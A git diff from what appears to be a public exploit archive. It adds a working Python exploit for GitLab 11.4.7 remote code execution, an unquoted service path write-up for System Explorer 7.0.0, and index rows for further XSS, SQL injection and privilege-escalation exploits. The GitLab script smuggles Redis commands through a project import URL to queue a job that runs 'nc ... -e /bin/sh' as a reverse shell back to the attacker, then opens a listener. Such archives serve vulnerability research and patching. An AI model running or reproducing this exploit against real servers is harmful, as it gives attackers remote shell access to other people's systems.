+ + + + +-- \ No newline at end of file diff --git a/exploits/ruby/webapps/49257.py b/exploits/ruby/webapps/49257.py new file mode 100755 index 000000000..e44dae0c7 --- /dev/null +++ b/exploits/ruby/webapps/49257.py @@ -0,0 +1,64 @@ +# Exploit Title: Gitlab 11.4.7 - Remote Code Execution +# Date: 14-12-2020 +# Exploit Author: Fortunato Lodari fox [at] thebrain [dot] net, foxlox +# Vendor Homepage: https://about.gitlab.com/ +# POC: https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/ +# Tested On: Debian 10 + Apache/2.4.46 (Debian) +# Version: 11.4.7 community + +import sys +import requests +import time +import random +import http.cookiejar +import os.path +from os import path + +# Sign in GitLab 11.4.7 portal and get (using Burp or something other): +# authenticity_token +# authenticated cookies +# username +# specify localport and localip for reverse shell + +username='aaaaaaaaaaaa' +authenticity_token='jpT/n1EoPwwWtiGu/+QKVQomofMNyqAQXY+iD2kVoRQoiQNzcFHPAj2+M4pyblKo/7UkClKW8jvp51Aw2qzs7g==' +cookie = '_gitlab_session=c942527505cc0580c026610a1799b811; sidebar_collapsed=false' +localport='1234' +localip='192.168.0.114' + + +url = "http://192.168.0.130:5080" +proxies = { "http": "http://localhost:8080" } + + +def deb(str): + print("Debug => "+str) + +def create_payload(authenticity_token,prgname,namespace_id,localip,localport,username): + return {'utf8':'✓','authenticity_token':authenticity_token,'project[ci_cd_only]':'false','project[name]':prgname,'project[namespace_id]':namespace_id,'project[path]':prgname,'project[description]':prgname,'project[visibility_level]':'20','':'project[initialize_with_readme]','project[import_url]':'git://[0:0:0:0:0:ffff:127.0.0.1]:6379/\n multi\n sadd resque:gitlab:queues system_hook_push\n lpush resque:gitlab:queue:system_hook_push "{\\"class\\":\\"GitlabShellWorker\\",\\"args\\":[\\"class_eval\\",\\"open(\'|nc '+localip+' '+localport+' -e /bin/sh\').read\\"],\\"retry\\":3,\\"queue\\":\\"system_hook_push\\",\\"jid\\":\\"ad52abc5641173e217eb2e52\\",\\"created_at\\":1513714403.8122594,\\"enqueued_at\\":1513714403.8129568}"\n exec\n exec\n exec\n/'+username+'/'+prgname+'.git'} + +import string +def random_string(length): + return ''.join(random.choice(string.ascii_letters) for m in range(length)) + +def init(username,cookie,authenticity_token,localport,localip): + from bs4 import BeautifulSoup + import re + import urllib.parse + deb("Token: "+authenticity_token) + deb("Cookie: "+cookie) + session=requests.Session() + headers = {'user-agent':'Moana Browser 1.0','Cookie':cookie,'Content-Type':'application/x-www-form-urlencoded','DNT':'1','Upgrade-Insecure-Requests':'1'} + r=session.get(url+'/projects/new',headers=headers,allow_redirects=True) + soup = BeautifulSoup(r.content,"lxml") + nsid = soup.findAll('input', {"id": "project_namespace_id"}) + namespace_id=nsid[0]['value']; + deb("Namespace ID: "+namespace_id) + prgname=random_string(8) + newpayload=create_payload(authenticity_token,prgname,namespace_id,localip,localport,username) + newpayload=urllib.parse.urlencode(newpayload) + deb("Payload encoded: "+newpayload) + r=session.post(url+'/projects',newpayload,headers=headers,allow_redirects=False) + os.system("nc -nvlp "+localport) + +init(username,cookie,authenticity_token,localport,localip) \ No newline at end of file diff --git a/exploits/windows/local/49248.txt b/exploits/windows/local/49248.txt new file mode 100644 index 000000000..3b3f8ec5f --- /dev/null +++ b/exploits/windows/local/49248.txt @@ -0,0 +1,29 @@ +# Exploit Title: System Explorer 7.0.0 - 'SystemExplorerHelpService' Unquoted Service Path +# Date: 2020-10-14 +# Exploit Author: Mohammed Alshehri +# Vendor Homepage: http://systemexplorer.net/ +# Software Link: http://systemexplorer.net/download/SystemExplorerSetup.exe +# Version: Version 7.0.0 +# Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763 + +# Service info: + +C:\Users\m507>sc qc SystemExplorerHelpService +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: SystemExplorerHelpService + TYPE : 20 WIN32_SHARE_PROCESS + START_TYPE : 3 DEMAND_START + ERROR_CONTROL : 0 IGNORE + BINARY_PATH_NAME : C:\Program Files (x86)\System Explorer\service\SystemExplorerService64.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : System Explorer Service + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem + +C:\Users\m507> + + +# Exploit: +This vulnerability could permit executing code during startup or reboot with the escalated privileges. \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 68282e8af..7875249b9 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -11230,6 +11230,7 @@ id,file,description,date,author,type,platform,port 49211,exploits/windows/local/49211.ps1,"Druva inSync Windows Client 6.6.3 - Local Privilege Escalation (PowerShell)",2020-12-07,1F98D,local,windows, 49221,exploits/multiple/local/49221.java,"Tibco ObfuscationEngine 5.11 - Fixed Key Password Decryption",2020-12-09,"Thomas Sluyter",local,multiple, 49226,exploits/windows/local/49226.txt,"PDF Complete 3.5.310.2002 - 'pdfsvc.exe' Unquoted Service Path",2020-12-10,"Zaira Alquicira",local,windows, +49248,exploits/windows/local/49248.txt,"System Explorer 7.0.0 - 'SystemExplorerHelpService' Unquoted Service Path",2020-12-14,"Mohammed Alshehri",local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -43463,3 +43464,15 @@ id,file,description,date,author,type,platform,port 49241,exploits/php/webapps/49241.txt,"Courier Management System 1.0 - 'First Name' Stored XSS",2020-12-11,Zhaiyi,webapps,php, 49242,exploits/php/webapps/49242.txt,"Courier Management System 1.0 - 'MULTIPART street ((custom) ' SQL Injection",2020-12-11,Zhaiyi,webapps,php, 49243,exploits/php/webapps/49243.txt,"Courier Management System 1.0 - 'ref_no' SQL Injection",2020-12-11,Zhaiyi,webapps,php, +49245,exploits/php/webapps/49245.txt,"Rukovoditel 2.6.1 - Cross-Site Request Forgery (Change password)",2020-12-14,KeopssGroup0day_Inc,webapps,php, +49246,exploits/multiple/webapps/49246.py,"LibreNMS 1.46 - MAC Accounting Graph Authenticated SQL Injection",2020-12-14,Hodorsec,webapps,multiple, +49247,exploits/multiple/webapps/49247.py,"MiniWeb HTTP Server 0.8.19 - Buffer Overflow (PoC)",2020-12-14,securityforeveryone.com,webapps,multiple, +49249,exploits/multiple/webapps/49249.txt,"Seacms 11.1 - 'ip and weburl' Remote Command Execution",2020-12-14,j5s,webapps,multiple, +49250,exploits/multiple/webapps/49250.txt,"Seacms 11.1 - 'file' Local File Inclusion",2020-12-14,j5s,webapps,multiple, +49251,exploits/multiple/webapps/49251.txt,"Seacms 11.1 - 'checkuser' Stored XSS",2020-12-14,j5s,webapps,multiple, +49252,exploits/multiple/webapps/49252.txt,"WordPress Plugin Total Upkeep 1.14.9 - Database and Files Backup Download",2020-12-14,Wadeek,webapps,multiple, +49253,exploits/multiple/webapps/49253.txt,"Rumble Mail Server 0.51.3135 - 'servername' Stored XSS",2020-12-14,"Mohammed Alshehri",webapps,multiple, +49254,exploits/multiple/webapps/49254.txt,"Rumble Mail Server 0.51.3135 - 'domain and path' Stored XSS",2020-12-14,"Mohammed Alshehri",webapps,multiple, +49255,exploits/multiple/webapps/49255.txt,"Rumble Mail Server 0.51.3135 - 'username' Stored XSS",2020-12-14,"Mohammed Alshehri",webapps,multiple, +49256,exploits/hardware/webapps/49256.py,"Macally WIFISD2-2A82 2.000.010 - Guest to Root Privilege Escalation",2020-12-14,"Maximilian Barz",webapps,hardware, +49257,exploits/ruby/webapps/49257.py,"Gitlab 11.4.7 - Remote Code Execution",2020-12-14,"Fortunato Lodari",webapps,ruby,